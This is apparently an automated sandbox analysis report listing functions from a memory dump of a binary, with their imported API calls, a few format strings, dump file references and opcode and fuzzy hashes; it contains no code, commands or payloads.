API String ID: 96147131-2892678728
Opcode ID: d3927a9c7e9e7f8f330873aed43e4cf022b3c903acfdf90a64c63799ab93ec1a
Instruction ID: 4cd2115a9fa3db871b73ac0b198eb001592e32675d8ccff4a5d8f97174b6cf52
Opcode Fuzzy Hash: d3927a9c7e9e7f8f330873aed43e4cf022b3c903acfdf90a64c63799ab93ec1a
Instruction Fuzzy Hash: 1C5125A1B086C591EB21AB95FD1527BE792BB45F84FE84131DE4D0B7C8DE6CE842C720

Function 00007FF78662BA80 Relevance: 10.6, APIs: 7, Instructions: 147COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,00007FF786612A37), ref: 00007FF78662BB14
memcpy.VCRUNTIME140(00000000,?,?,00007FF786612A37), ref: 00007FF78662BB58
memcpy.VCRUNTIME140(00000000,?,?,00007FF786612A37), ref: 00007FF78662BB70
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,00007FF786612A37), ref: 00007FF78662BBF8
memcpy.VCRUNTIME140(00000000,?,?,00007FF786612A37), ref: 00007FF78662BC25
memcpy.VCRUNTIME140(00000000,?,?,00007FF786612A37), ref: 00007FF78662BC40
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF78662BC63

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: 513591ccb8ea7f0dc84527b17920d2e3f1dcf4cd211d2874c8ff9808d040457b
Instruction ID: fd3db3e75e0d17981fe56dfcc164c11b5d3410a80d746b606ecc123e75825d20
Opcode Fuzzy Hash: 513591ccb8ea7f0dc84527b17920d2e3f1dcf4cd211d2874c8ff9808d040457b
Instruction Fuzzy Hash: 4451B532B04BC1A1EB10AF25D9442AA6363FB55B88FA84632DF5C07791CF38E9D5D351

Function 00007FF78662A9E0 Relevance: 10.6, APIs: 7, Instructions: 133COMMON

Download Yara Rule

APIs

?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,00007FF786614B65), ref: 00007FF78662AA73
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,00007FF786614B65), ref: 00007FF78662AAC6
?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,?,?,?,00007FF786614B65), ref: 00007FF78662AAEF
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,00007FF786614B65), ref: 00007FF78662AB16
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,00007FF786614B65), ref: 00007FF78662AB5C
?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,?,?,?,00007FF786614B65), ref: 00007FF78662AB63
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,00007FF786614B65), ref: 00007FF78662AB70

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
String ID:
API String ID: 729925803-0
Opcode ID: f562df51e2c10ca44dab1a5043dac6a7c392a16626acdc964eea678447abf8e1
Instruction ID: a53acbff08925ffc46e1678810b049017e01d91d6b5afb9c3e64b3118f361f11
Opcode Fuzzy Hash: f562df51e2c10ca44dab1a5043dac6a7c392a16626acdc964eea678447abf8e1
Instruction Fuzzy Hash: 6C516222709A8192EB209B19DA9023AE7A2FF45F91F65C531CE5E437A0CF7DD846CB11

Function 00007FF78662B0F0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF786629E1A), ref: 00007FF78662B11D
??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF786629E1A), ref: 00007FF78662B137
?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF786629E1A), ref: 00007FF78662B169
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF786629E1A), ref: 00007FF78662B194
std::_Facet_Register.LIBCPMT ref: 00007FF78662B1AD
??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF786629E1A), ref: 00007FF78662B1CC
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF78662B1F7

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
String ID:
API String ID: 762505753-0
Opcode ID: c6e6ef72eb529d48c11664ff68e77adead01e74f8777e7b2b03cf17b034884ae
Instruction ID: 22cb7cd6a5fc19dc8168beb800cefdb59d565bfd818c2d6d4637b751419454db
Opcode Fuzzy Hash: c6e6ef72eb529d48c11664ff68e77adead01e74f8777e7b2b03cf17b034884ae
Instruction Fuzzy Hash: 4F316535B08B8191EB14AF11ED4416BB762FB48B94F980631DA9D077A4CF3CD894CB11

Function 00007FF78662AE10 Relevance: 9.2, APIs: 6, Instructions: 178COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF78662AED8

Part of subcall function 00007FF78662CFB4: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF78662B985,?,?,?,?,?,00007FF786629EF5), ref: 00007FF78662CFCE

memset.VCRUNTIME140 ref: 00007FF78662AF5D
DeviceIoControl.KERNEL32 ref: 00007FF78662B038
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662B09A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF78662B0D5
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF78662B0E1

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: Concurrency::cancel_current_taskmemset$ControlDevice_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 4066468686-0
Opcode ID: 72e1392b3be96d1fbdb399585bb3dfb98613b5871dbe88a5d879b683c89b0b6a
Instruction ID: 3c1665b97b44307f66610aa411dd42539ffec3d7b5ca6ee9c1ffa6b3b489991e
Opcode Fuzzy Hash: 72e1392b3be96d1fbdb399585bb3dfb98613b5871dbe88a5d879b683c89b0b6a
Instruction Fuzzy Hash: EA719222B096C195EB11EB15A9043ABF3A2FB84BA4F644735DAAD03BD4CF7CD841CB51

Function 00007FF7865F2860 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 131stringCOMMON

Download Yara Rule

APIs

strstr.VCRUNTIME140 ref: 00007FF7865F29D7

Strings

Size=%d,%d, xrefs: 00007FF7865F2A1E
Collapsed=%d, xrefs: 00007FF7865F2A3A
[%s][%s], xrefs: 00007FF7865F29E1
Pos=%d,%d, xrefs: 00007FF7865F2A01
###, xrefs: 00007FF7865F29CD

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: strstr
String ID: ###$Collapsed=%d$Pos=%d,%d$Size=%d,%d$[%s][%s]
API String ID: 1392478783-2972057365
Opcode ID: 31ea54d5e077d2ce4ed5a18cf93e03cf0a6d179f2c85c5c0adce628be06480ca
Instruction ID: 91031b42fb2914bf04a413e272d11258c1f1b88ff32ad082ede9287217a4b363
Opcode Fuzzy Hash: 31ea54d5e077d2ce4ed5a18cf93e03cf0a6d179f2c85c5c0adce628be06480ca
Instruction Fuzzy Hash: 78510972A18686D6DB11EF51E84247AB761FF84B84FA58135DE9D07354CF3CE881CB20

Function 00007FF78662B8D0 Relevance: 9.1, APIs: 6, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,?,?,00007FF786629EF5), ref: 00007FF78662B9BE
memcpy.VCRUNTIME140(?,?,?,?,?,00007FF786629EF5), ref: 00007FF78662B9CC
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00007FF786629EF5), ref: 00007FF78662BA05
memcpy.VCRUNTIME140(?,?,?,?,?,00007FF786629EF5), ref: 00007FF78662BA0F
memcpy.VCRUNTIME140(?,?,?,?,?,00007FF786629EF5), ref: 00007FF78662BA1D
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF78662BA4F

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: 59ec51f713108a694fc918e1d86239938008307f5ef79c90ebe3a65af4c44cc8
Instruction ID: 60aa841b6459f5254e4d3dd02bcde5aa6adc56c8aee765825c94a87c858d7ac8
Opcode Fuzzy Hash: 59ec51f713108a694fc918e1d86239938008307f5ef79c90ebe3a65af4c44cc8
Instruction Fuzzy Hash: 2C41E262B08AC2A1EF10AB12E8043AAE353FB44BD8FA84631DE5D0B7C5DE3CD941C711

Function 00007FF78662BF40 Relevance: 9.1, APIs: 6, Instructions: 122COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7866129C8), ref: 00007FF78662C02A
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7866129C8), ref: 00007FF78662C039
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7866129C8), ref: 00007FF78662C06D
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7866129C8), ref: 00007FF78662C074
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7866129C8), ref: 00007FF78662C083
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF78662C0AE

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: 43d5decee7440c29b4e702e697857633f3b0710484b5a3146c5a711bc1f325ae
Instruction ID: 284a531407eecf7f2aa06eac02b9a04a2cf6f85ed55495703858e3b3fa57b5a8
Opcode Fuzzy Hash: 43d5decee7440c29b4e702e697857633f3b0710484b5a3146c5a711bc1f325ae
Instruction Fuzzy Hash: C041C2A1B097C2A0EF50AB12A8043AAE253FB44BD4FE40631DA5D077C5CE3DE881CB51

Function 00007FF78662B740 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FF78662B82D
memset.VCRUNTIME140 ref: 00007FF78662B83A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662B873
memcpy.VCRUNTIME140 ref: 00007FF78662B87D
memset.VCRUNTIME140 ref: 00007FF78662B88A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF78662B8BF

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: memcpymemset$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3189120677-0
Opcode ID: 4c0059edc66f98f0feb7a93b03dbf6daf3c0ba0d6c1fe3638ff6ea485f6b361c
Instruction ID: 5a2c778de9f391d92e27b92d618c97b28b4c6dec0f2b7ed5ee36b45400d64d15
Opcode Fuzzy Hash: 4c0059edc66f98f0feb7a93b03dbf6daf3c0ba0d6c1fe3638ff6ea485f6b361c
Instruction Fuzzy Hash: C341B561B09AC2A5EB10EB12A9043ABE353FB44BD8FA84631DE5D077D5DE7CE841C721

Function 00007FF786629870 Relevance: 9.1, APIs: 6, Instructions: 114COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF786612701), ref: 00007FF7866298BC
memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF786612701), ref: 00007FF786629958
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF786629977
??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF786612701), ref: 00007FF7866299DB
??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF786612701), ref: 00007FF7866299E4

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@memset$??1?$basic_ios@??1?$basic_istream@Concurrency::cancel_current_task
String ID:
API String ID: 915423947-0
Opcode ID: afce2a08b22aa8ee083cf930a407ffbe3c27b8a17144efdd1399bdb0574eadc0
Instruction ID: 75dcd641d4a4ba72117ab7129f626883bfeec4eff88bbe34fa0f62fb4d0772bc
Opcode Fuzzy Hash: afce2a08b22aa8ee083cf930a407ffbe3c27b8a17144efdd1399bdb0574eadc0
Instruction Fuzzy Hash: E141C732B047C595EB14AB56E8403AAA352FB84BA4F644731DB6C077D5DF38D891CB11

Function 00007FF786629D40 Relevance: 9.1, APIs: 6, Instructions: 84COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z.MSVCP140 ref: 00007FF786629D7A
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF786629D97
_get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF786629DC0
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF786629E0B

Part of subcall function 00007FF78662B0F0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF786629E1A), ref: 00007FF78662B11D
Part of subcall function 00007FF78662B0F0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF786629E1A), ref: 00007FF78662B137
Part of subcall function 00007FF78662B0F0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF786629E1A), ref: 00007FF78662B169
Part of subcall function 00007FF78662B0F0: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF786629E1A), ref: 00007FF78662B194
Part of subcall function 00007FF78662B0F0: std::_Facet_Register.LIBCPMT ref: 00007FF78662B1AD
Part of subcall function 00007FF78662B0F0: ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF786629E1A), ref: 00007FF78662B1CC

?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF786629E20
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF786629E37

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$Init@?$basic_streambuf@Lockit@std@@$??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@Bid@locale@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
String ID:
API String ID: 3911317180-0
Opcode ID: aa924db88ae406aae9595ddd98dc093736adb0616978bee2f94a353b5b7a2f56
Instruction ID: 64071f3729f2e5cedbdc3ccb16507275dc9931aeea79b32f2f02e1610700b7f9
Opcode Fuzzy Hash: aa924db88ae406aae9595ddd98dc093736adb0616978bee2f94a353b5b7a2f56
Instruction Fuzzy Hash: D3315C32719B8192EB50AF26E94436AB3A6FB88F88F640135DE8D07754DF3CD845CB50

Function 00007FF786617050 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

__std_fs_code_page.MSVCPRT ref: 00007FF7866170AF

Part of subcall function 00007FF78662DA00: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00007FF7866170B4), ref: 00007FF78662DA04
Part of subcall function 00007FF78662DA00: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF7866170B4), ref: 00007FF78662DA13

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661722D

Part of subcall function 00007FF78662B5D0: memcpy.VCRUNTIME140(?,00000000,00000004,?,00007FF7866171FA), ref: 00007FF78662B6B2

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661727B

Strings

: ", xrefs: 00007FF78661716A
", ", xrefs: 00007FF78661719D

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ApisFile___lc_codepage_func__std_fs_code_pagememcpy
String ID: ", "$: "
API String ID: 2077005984-747220369
Opcode ID: 274efefb0977a36c76b117e822037b346f289c8b0d12b5adda7fc53a25a5a156
Instruction ID: b572f822fa59293b00e756b6eec4c1f1850938b2b5cff72aa0156ee918acb06a
Opcode Fuzzy Hash: 274efefb0977a36c76b117e822037b346f289c8b0d12b5adda7fc53a25a5a156
Instruction Fuzzy Hash: 1961ADA2B04B80AAEB00EF65D9403AE6363FB48B98F504631DF5D17B89DF38D951C390

Function 00007FF7865FE9B0 Relevance: 8.8, APIs: 7, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7865FEB20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7865FE9D0), ref: 00007FF7865FEB76
Part of subcall function 00007FF7865FEB20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7865FE9D0), ref: 00007FF7865FEC19
Part of subcall function 00007FF7865FEB20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7865FE9D0), ref: 00007FF7865FEC42

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FE9EB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FEA0C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FEA59
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FEA89
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FEAAE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FEAD3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FEAF4

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 8beb4a70d84814f3a84ad11d8969956394b205aa5d7a2c61af889b97717b44c7
Instruction ID: 6ee240699e5dfabcb022721c8efd8d9da765568002fd3c1b3c9d2920ce38ef60
Opcode Fuzzy Hash: 8beb4a70d84814f3a84ad11d8969956394b205aa5d7a2c61af889b97717b44c7
